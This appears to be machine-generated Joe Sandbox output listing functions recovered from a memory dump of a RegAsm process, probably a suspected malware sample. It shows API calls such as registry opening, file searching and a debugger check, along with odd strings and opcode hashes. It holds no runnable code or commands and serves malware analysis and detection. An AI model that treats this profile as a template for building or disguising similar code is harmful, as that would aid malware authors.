Part of subcall function 0051CE70: SetLastError.KERNEL32(000005B6), ref: 0051CF1F

boost::exception::~exception.LIBCPMTD ref: 0051D0F4

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLastboost::exception::~exception
String ID:
API String ID: 2030483509-0
Opcode ID: 127a9da44362022521f033e18a0ae39a28386dc14d0daf764fa44cf252a51278
Instruction ID: 9d65acf10fa5897c4cb51372974a7a7b872250a04e27f6b01d4dc6cbf0bd463c
Opcode Fuzzy Hash: 127a9da44362022521f033e18a0ae39a28386dc14d0daf764fa44cf252a51278
Instruction Fuzzy Hash: 10F08C75840649EBCB04EF84D942BAEBF78FB44B20F10472CF426636D0DB352A00CB91

Function 0050C650 Relevance: 1.3, APIs: 1, Instructions: 26COMMON

Download Yara Rule

APIs

CharNextA.USER32(00000000,00000000,?,0050C6A6,0050CCEF,0000002E,00000000,?,0050CCEF), ref: 0050C660

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: CharNext
String ID:
API String ID: 3213498283-0
Opcode ID: e0a00663e9917bfe8e8533278bc9554091e04477d1fbdc4f7316dc4c04211636
Instruction ID: dd8f41f4e9f27020e8a2b087f4928897653eaeb815a31aef6cf1a2e453e85e8b
Opcode Fuzzy Hash: e0a00663e9917bfe8e8533278bc9554091e04477d1fbdc4f7316dc4c04211636
Instruction Fuzzy Hash: B4F01C30A08248EBCB20CBA8C54046D7FF5AB4A301B24469AE80597241D632DF00AB80

Non-executed Functions

Function 00540905 Relevance: 15.2, APIs: 10, Instructions: 200fileCOMMON

Download Yara Rule

APIs

GetFileAttributesExW.KERNEL32(00440315,00000000,?), ref: 0054099D
GetLastError.KERNEL32 ref: 005409A7
FindFirstFileW.KERNEL32(00440315,?), ref: 005409BE
GetLastError.KERNEL32 ref: 005409C9
FindClose.KERNEL32(00000000), ref: 005409D5
___std_fs_open_handle@16.LIBCPMT ref: 00540A8E

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorFileFindLast$AttributesCloseFirst___std_fs_open_handle@16
String ID:
API String ID: 2340820627-0
Opcode ID: d42f15c2a6db202036fe90f2e2bfb0e91550acdf50c4596346993b15bfd7011d
Instruction ID: d438b49d91ebf40d0e8e65f5be02901b8155060303c3cbee24098b5dc06c8deb
Opcode Fuzzy Hash: d42f15c2a6db202036fe90f2e2bfb0e91550acdf50c4596346993b15bfd7011d
Instruction Fuzzy Hash: E0719B74A00619AFDB60CF28C888BEEBBB8FF15328F245695E954E32C1DB709D44CB51

Function 0042CD50 Relevance: 14.6, APIs: 6, Strings: 2, Instructions: 551COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0042CE3E
__aulldiv.LIBCMT ref: 0042CEC0

Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81

__aulldiv.LIBCMT ref: 0042CFCE

Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82

WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,00000104,00000000,00000000,00000000,eks,?), ref: 0042D3B5

Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1

__aulldiv.LIBCMT ref: 0042D23D

Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF

__aulldiv.LIBCMT ref: 0042D537

Strings

eks, xrefs: 0042D288, 0042D2B7
j3l6lrek, xrefs: 0042D346, 0042D375

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv$ExclusiveLock$AcquireRelease$ByteCharConditionMultiVariableWakeWide
String ID: eks$j3l6lrek
API String ID: 2311560058-388657971
Opcode ID: 5cf202f8e67c7da8d9daed08b3b257a6e9f560406cf20015c131f7c2467b6a86
Instruction ID: 656ff1fafc0402bd15cf97b20929c59a3b500642dc8d12530b5c4c7dbac2176f
Opcode Fuzzy Hash: 5cf202f8e67c7da8d9daed08b3b257a6e9f560406cf20015c131f7c2467b6a86
Instruction Fuzzy Hash: 48324A74E002289FEB24DF64DC55BEEBBB1BB88304F1081A9E909A7381D7746E85CF55

Function 004242B0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 284registryCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00424313

Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81

__aulldiv.LIBCMT ref: 00424358
__aulldiv.LIBCMT ref: 004244C9
RegOpenKeyExA.ADVAPI32(80000001,?,?,?,?,?,?,?,?,00000085,00000000,00000007,00000000,?,0000AA7A,00000000), ref: 004244EF
RegCloseKey.ADVAPI32(?), ref: 00424542

Strings

eks, xrefs: 00424559, 00424588
j3l6lrek, xrefs: 00424617, 00424646

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv$CloseOpen
String ID: eks$j3l6lrek
API String ID: 2588155767-388657971
Opcode ID: d54ed6e59801b497854ceb0a52a8a09c8a816cf6ad6ecfae637070fcfd0a4fc5
Instruction ID: 491dfe973cfee1e3c9ef4379c42601739974c236a8ee3e86afb2c1e71b1db1af
Opcode Fuzzy Hash: d54ed6e59801b497854ceb0a52a8a09c8a816cf6ad6ecfae637070fcfd0a4fc5
Instruction Fuzzy Hash: 99C14A70E04218AFDB14CFA4DC91BAEBBB5FF89304F14809AE509A7391DB386A45CF55

Function 004213A0 Relevance: 12.5, APIs: 5, Strings: 2, Instructions: 284registryCOMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 00421403

Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81

__aulldiv.LIBCMT ref: 00421448
__aulldiv.LIBCMT ref: 004215B9
RegOpenKeyExA.ADVAPI32(80000001,?,?,?,?,?,?,?,?,00000085,00000000,00000007,00000000,?,0000AA7A,00000000), ref: 004215DF
RegCloseKey.ADVAPI32(?), ref: 00421632

Strings

eks, xrefs: 00421649, 00421678
j3l6lrek, xrefs: 00421707, 00421736

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv$CloseOpen
String ID: eks$j3l6lrek
API String ID: 2588155767-388657971
Opcode ID: 90f2cce5a871e8957ab653f398eb021dd321b8770b3ca6ae1ebc5dfb0708e7fa
Instruction ID: 445fe49cdeaca878d9e7818506fae736db94ce0e42e47b148ad41fdb42a36499
Opcode Fuzzy Hash: 90f2cce5a871e8957ab653f398eb021dd321b8770b3ca6ae1ebc5dfb0708e7fa
Instruction Fuzzy Hash: 5EC17C70E04218AFDB14CFA4DC95BAEBBB5BF98304F14809AE409B7391DB346A45CF55

Function 00442070 Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 455memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82

__aulldiv.LIBCMT ref: 00442204
GlobalAlloc.KERNEL32(00000040,?,?,?,?,?,00000085,00000000,00000007,00000000,0000AA7A,00000000), ref: 0044222A
GetLastError.KERNEL32(?,0000AA7A,00000000), ref: 004423EE
GetLastError.KERNEL32(?,0000AA7A,00000000), ref: 004426C4

Strings

eks, xrefs: 004422AC, 004422DB, 00442408, 00442437
j3l6lrek, xrefs: 0044236A, 00442399, 004424C6, 004424F5

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast__aulldiv$AllocGlobal
String ID: eks$j3l6lrek
API String ID: 2907542317-388657971
Opcode ID: 556c2f285755703d5c9aa74c8e74b21004e211ec889bfb1bc59f4dba5893a372
Instruction ID: 9f84a0050f59e8236fd2ba38f95f3d1390ff4bc6d5cb27f74b57c34b6ddbe6ce
Opcode Fuzzy Hash: 556c2f285755703d5c9aa74c8e74b21004e211ec889bfb1bc59f4dba5893a372
Instruction Fuzzy Hash: E6126CB0E002189FEB24CFA4CD51BEEBBB5BB48304F1481AAE509A7381D7785E85CF55

Function 00567E9D Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 188COMMON

Download Yara Rule

APIs

PMDtoOffset.LIBCMT ref: 00567F2F

Strings

Bad dynamic_cast!, xrefs: 00567F71

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Offset
String ID: Bad dynamic_cast!
API String ID: 1587990502-2956939130
Opcode ID: 20f3693d08572e597083f22b303d3ab7abb4cb9912c833fe1fd9c5369746976c
Instruction ID: 975de1d90ee75d9ecaa86030a501d587ede8577b15ad686d0425f08efe5c4ed0
Opcode Fuzzy Hash: 20f3693d08572e597083f22b303d3ab7abb4cb9912c833fe1fd9c5369746976c
Instruction Fuzzy Hash: 41510972A04209ABCB14DF68DC499BABFA5FF89324F048669ED1597241EB31FD14C7A0

Function 00561860 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLocaleInfoW.KERNEL32(?,2000000B,00561B72,00000002,00000000,?,?,?,00561B72,?,00000000), ref: 005618F9
GetLocaleInfoW.KERNEL32(?,20001004,00561B72,00000002,00000000,?,?,?,00561B72,?,00000000), ref: 00561922
GetACP.KERNEL32(?,?,00561B72,?,00000000), ref: 00561937

Strings

OCP, xrefs: 005618B4
ACP, xrefs: 0056187E

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: InfoLocale
String ID: ACP$OCP
API String ID: 2299586839-711371036
Opcode ID: c2ab0fff28f4a76f52ff4344313262480a5841cb279491b13e57ae138434488c
Instruction ID: 40d7558f0b0175fc942c61baf373a59243dbf15b6e24df5cd838e8e648014c1c
Opcode Fuzzy Hash: c2ab0fff28f4a76f52ff4344313262480a5841cb279491b13e57ae138434488c
Instruction Fuzzy Hash: FE218622A00905AAEB348F64C911AB77EB7BF60F50B5E8424E94ADB201EB32DD41D358

Function 0042D570 Relevance: 8.0, APIs: 5, Instructions: 492COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0042D702

Part of subcall function 0041FB00: __aulldiv.LIBCMT ref: 0041FB82

__aulldiv.LIBCMT ref: 0042D900

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: 96229af1ec73a132a9f2b956c9a4d879bf3abf79f5ce90cf25ed705133bd5bc4
Instruction ID: bb14e70ad36b082a0b5e9c8789b4c92799cc7f9f4f447bf921ed53f564aa29e2
Opcode Fuzzy Hash: 96229af1ec73a132a9f2b956c9a4d879bf3abf79f5ce90cf25ed705133bd5bc4
Instruction Fuzzy Hash: CB127EB1E00219AFEB24DF64DC51BAEBBB5BF88304F1481A9F809A7381DB346D448F55

Function 00561A3C Relevance: 7.7, APIs: 5, Instructions: 182COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7

GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00561B44
IsValidCodePage.KERNEL32(00000000), ref: 00561B82
IsValidLocale.KERNEL32(?,00000001), ref: 00561B95
GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00561BDD
GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00561BF8

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
String ID:
API String ID: 415426439-0
Opcode ID: ca024633b9754248d0d0cfe8ded1d1c962b50105e441bf64056eb0b1e61b4ea5
Instruction ID: 9d7a95eafc06635e98c18416b46754a86e572d1fc1e9b3110dad2ce25cbd1492
Opcode Fuzzy Hash: ca024633b9754248d0d0cfe8ded1d1c962b50105e441bf64056eb0b1e61b4ea5
Instruction Fuzzy Hash: 7D519471A00A069FEB10DFA5CC45BBE7BB8FF44700F184469E915E7291EBB09D44CB65

Function 00441480 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 311COMMON

Download Yara Rule

APIs

Part of subcall function 0053F1AA: AcquireSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1B5
Part of subcall function 0053F1AA: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,-0000AA73,?,00431705,00591F6C,?,00000007,00000000,?,00000000,?,?,?,00000007,00000000), ref: 0053F1EF

__aulldiv.LIBCMT ref: 00441791

Part of subcall function 0053F159: AcquireSRWLockExclusive.KERNEL32(0058F970,-0000AA73,?,00431732,00591F6C), ref: 0053F163
Part of subcall function 0053F159: ReleaseSRWLockExclusive.KERNEL32(0058F970,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F196
Part of subcall function 0053F159: WakeAllConditionVariable.KERNEL32(0058F96C,?,00431732,00591F6C,?,?,?,?,?,?,?,?,?,?,?,00000007), ref: 0053F1A1

Strings

eks, xrefs: 004417EB, 0044181A
j3l6lrek, xrefs: 004418A9, 004418D8
^)<, xrefs: 0044157B

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ExclusiveLock$AcquireRelease$ConditionVariableWake__aulldiv
String ID: ^)<$eks$j3l6lrek
API String ID: 2808616827-1691098573
Opcode ID: 723989c750d8c448b757ed57353dbe1d082044221ca97999f286e016c4428ad5
Instruction ID: 61ddee64e97e81d89b636c2aae87605fd75d4fc85ae8e501c6fc247a7cddca84
Opcode Fuzzy Hash: 723989c750d8c448b757ed57353dbe1d082044221ca97999f286e016c4428ad5
Instruction Fuzzy Hash: 88E16670D002589FDF14DFA9D881BEEBBB1BF89304F1481AAE409A7351DB346A85CF65

Function 005610C7 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 254COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7

GetACP.KERNEL32(?,?,?,?,?,?,00556E86,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00561186
IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00556E86,?,?,?,00000055,?,-00000050,?,?), ref: 005611BD
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00561320

Strings

utf8, xrefs: 0056128F

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$CodeInfoLocalePageValid
String ID: utf8
API String ID: 607553120-905460609
Opcode ID: 125a8fdb11863665becb5fb8a9e623b02eeda480228334a53646febdf7755d45
Instruction ID: c229f9fa798894be58daefa86f0deebb0b3adf3289c2bac1009a216d3c08dae4
Opcode Fuzzy Hash: 125a8fdb11863665becb5fb8a9e623b02eeda480228334a53646febdf7755d45
Instruction Fuzzy Hash: 3B715A71A00B07AADB24AB75CC4ABBB7FA8FF45700F18452AF905DB181EB70D944D758

Function 00552DA0 Relevance: 6.5, APIs: 4, Instructions: 455COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7505400ce6ba04d7e6a24cd4f4b2d4ed70d869f0fa5c6f3eb332725e7596dd30
Instruction ID: 98593d961832b577bb604902065ba2b3044358f249b4719abe734af665d25c4e
Opcode Fuzzy Hash: 7505400ce6ba04d7e6a24cd4f4b2d4ed70d869f0fa5c6f3eb332725e7596dd30
Instruction Fuzzy Hash: 84025F75E006199BDF14CFA8D8906ADFBF1FF48315F14816AE919E7380D731AA45CB90

Function 004210E0 Relevance: 6.3, APIs: 4, Instructions: 252COMMON

Download Yara Rule

APIs

__aulldiv.LIBCMT ref: 0042114D

Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC38
Part of subcall function 0041FBD0: __aulldiv.LIBCMT ref: 0041FC81

__aulldiv.LIBCMT ref: 004211CB
__aulldiv.LIBCMT ref: 00421290

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: __aulldiv
String ID:
API String ID: 3732870572-0
Opcode ID: 775faa42a7d552b4bdd8f93d78419dba34c0cdce023d96a9e4ae6639acb04b62
Instruction ID: b60834f5db5e1552b2b962e335da81e27a52cddb86fc4325a32176b2e4c97051
Opcode Fuzzy Hash: 775faa42a7d552b4bdd8f93d78419dba34c0cdce023d96a9e4ae6639acb04b62
Instruction Fuzzy Hash: 119170B5E00208AFEB14DFA4DC51FAEBBB9FB98714F208119F904BB2D4D77469018B65

Function 005406BF Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 32windowCOMMON

Download Yara Rule

APIs

GetLocaleInfoEx.KERNEL32(!x-sys-default-locale,20000001,00000000,00000002,?,?,0041F6CD,?,00000000), ref: 005406D3
FormatMessageA.KERNEL32(00001300,00000000,?,00000000,0041F6CD,00000000,00000000,?,?,0041F6CD,?,00000000), ref: 005406FA

Strings

!x-sys-default-locale, xrefs: 005406CE

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: FormatInfoLocaleMessage
String ID: !x-sys-default-locale
API String ID: 4235545615-2729719199
Opcode ID: 20989b94304a7defb237158a79aa7857ec4fe8fe38480a26bcda83b1aef4dd94
Instruction ID: 0e6d38edd00be859f6cf78a91d2be4bd9eac5d4685f0f32cae1fa79fc940a6ab
Opcode Fuzzy Hash: 20989b94304a7defb237158a79aa7857ec4fe8fe38480a26bcda83b1aef4dd94
Instruction Fuzzy Hash: 87F01C75610205FFEB049BD5DD0ADEF7BACEB49794B114015BA42D6180E2B0AE1097B0

Function 005614E4 Relevance: 4.7, APIs: 3, Instructions: 205COMMON

Download Yara Rule

APIs

Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00561538
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00561582
GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 00561648

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: InfoLocale$ErrorLast
String ID:
API String ID: 661929714-0
Opcode ID: 0b6528ed2727af672cad1082899e4a17bddceb69dc66016f5d56a2f29a8f21a4
Instruction ID: 70c1aa71be4d85ad4eb85358a0efa33ec9ce2a5a9ef07227a9ee6fcf816bf23e
Opcode Fuzzy Hash: 0b6528ed2727af672cad1082899e4a17bddceb69dc66016f5d56a2f29a8f21a4
Instruction Fuzzy Hash: 4761AF75900A079FEB289F28CD86BBA7BB8FF04300F184179E906C7681EB34D985CB54

Function 00553C90 Relevance: 4.6, APIs: 3, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32(?,?,?,?,?,-000A8750), ref: 00553D88
SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,-000A8750), ref: 00553D92
UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,-000A8750), ref: 00553D9F

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ExceptionFilterUnhandled$DebuggerPresent
String ID:
API String ID: 3906539128-0
Opcode ID: 9a018ef6bc7f006d2d5b9871a2d5a14fba6324950fd96809d316f4df3e492099
Instruction ID: 5739e484f8b64ed1158f2adb511fc395c4ea5408645fc0710bc97b51debf59f2
Opcode Fuzzy Hash: 9a018ef6bc7f006d2d5b9871a2d5a14fba6324950fd96809d316f4df3e492099
Instruction Fuzzy Hash: 9131C174901229ABCB21DF68DC887CDBBB8BF08350F5041EAE80CA7290E7709F858F44

Function 00561737 Relevance: 1.6, APIs: 1, Instructions: 83COMMON

Download Yara Rule

APIs

Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 0056178B

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: 12314db74dc1c780a7f071075102a6d7ad0d4ebf62ed34c4e0022942b85259d0
Instruction ID: 525e2d3deaa755b1367135d3ace304a61511168b89152ff51cc4dfa5dad0c6b6
Opcode Fuzzy Hash: 12314db74dc1c780a7f071075102a6d7ad0d4ebf62ed34c4e0022942b85259d0
Instruction Fuzzy Hash: 1C219272600607ABDB289A25DC45A7B7BA8FF44711F14417AFD01D7241EB34ED45C754

Function 005613BE Relevance: 1.6, APIs: 1, Instructions: 63COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7

EnumSystemLocalesW.KERNEL32(005614E4,00000001,00000000,?,-00000050,?,00561B18,00000000,?,?,?,00000055,?), ref: 00561430

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 21ce9017f429e29c507f143db8d43db0c9d3451e451c8b9caf143c15956b3100
Instruction ID: 180f8680915f0e2750d0feb05cf390752d4532b0f2bdb17f0f286a0e4d458973
Opcode Fuzzy Hash: 21ce9017f429e29c507f143db8d43db0c9d3451e451c8b9caf143c15956b3100
Instruction Fuzzy Hash: F211253A200B015FDF289F39C8916BABB91FF84359B18442DE98787B40D771B842CB44

Function 00561966 Relevance: 1.5, APIs: 1, Instructions: 48COMMON

Download Yara Rule

APIs

Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7

GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,005617E1,00000000,00000000,?), ref: 00561992

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID:
API String ID: 3736152602-0
Opcode ID: e6566e4f1a3b52a8953e7b7c61f10ab0633314299bf4cecfc55e456ca9af0dec
Instruction ID: 154d179d65967cd39def3a332d30e682769adac159f1085352af7702dae20319
Opcode Fuzzy Hash: e6566e4f1a3b52a8953e7b7c61f10ab0633314299bf4cecfc55e456ca9af0dec
Instruction Fuzzy Hash: F501DB32A009166BDF18562588157BA3F68FB40395F194469ED46E3180EE74ED41C798

Function 005612CC Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7

GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00561320

Strings

utf8, xrefs: 0056128F

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$InfoLocale
String ID: utf8
API String ID: 3736152602-905460609
Opcode ID: 1e0f790edf6219d0087bedd49c03608ce0d3e650134530e563ebd2cc61586877
Instruction ID: aee0512e19c8a49db782e0b08c784dc8b685f258d65ca6f674f0ee33791576ef
Opcode Fuzzy Hash: 1e0f790edf6219d0087bedd49c03608ce0d3e650134530e563ebd2cc61586877
Instruction Fuzzy Hash: C6F0C832700206ABD714AB74DC49ABA37ECFF85315F1501BAF906EB241EA74AD049754

Function 00561459 Relevance: 1.5, APIs: 1, Instructions: 41COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 0055AF41: GetLastError.KERNEL32(00000000,00553EAB,0055E4B5), ref: 0055AF45
Part of subcall function 0055AF41: SetLastError.KERNEL32(00000000,00000000,-000A8750,00000006,000000FF), ref: 0055AFE7

EnumSystemLocalesW.KERNEL32(00561737,00000001,?,?,-00000050,?,00561AE0,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 005614A3

Memory Dump Source

Source File: 00000002.00000002.1662298009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_RegAsm.jbxd

Similarity

API ID: ErrorLast$EnumLocalesSystem
String ID:
API String ID: 2417226690-0
Opcode ID: 741fb869a1053948aadea0cbad9fff4b362ef6a6ed194ecfcb899d0c432c9017
